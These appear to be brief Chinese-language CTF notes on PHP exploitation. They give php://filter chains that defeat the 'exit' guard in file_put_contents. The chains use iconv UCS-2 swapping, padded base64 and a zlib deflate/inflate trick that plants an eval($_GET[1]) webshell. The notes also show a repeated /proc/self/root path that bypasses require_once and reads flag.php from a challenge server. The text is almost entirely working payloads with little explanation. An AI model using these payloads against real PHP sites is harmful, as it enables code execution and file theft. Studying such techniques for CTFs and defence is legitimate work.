checkin
- 偽協議處理時會對過濾器urldecode一次,所以是可以利用二次編碼繞過
- 繞過“死亡exit”
- 關於file_put_contents的一些小測試
- base64
- rot13
- strip_tags
php://filter//convert.iconv.UCS-2LE.UCS-2BE|?<hp phpipfn(o;)>?/resource=Cyc1e.php- base64+iconv解決
=問題$a='php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode|AAPD9waHAgcGhwaW5mbygpOz8+/resource=Cyc1e.php'; #base64編碼前補了AA,原理一樣,補齊位數 - zlib.inflate/deflate
php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=Cyc1e.php
Make PHP Great Again
從PHP源碼看PHP文件操作缺陷與利用技巧
php源碼分析 require_once 繞過不能重復包含文件的限制
require_once 包含的軟鏈接層數較多使 once 的 hash 匹配會直接失效造成重復包含
http://cefiejf3iofj3s.c.zhaoj.in/?file=php://filter/read=convert.base64-encode/resource=file:///proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php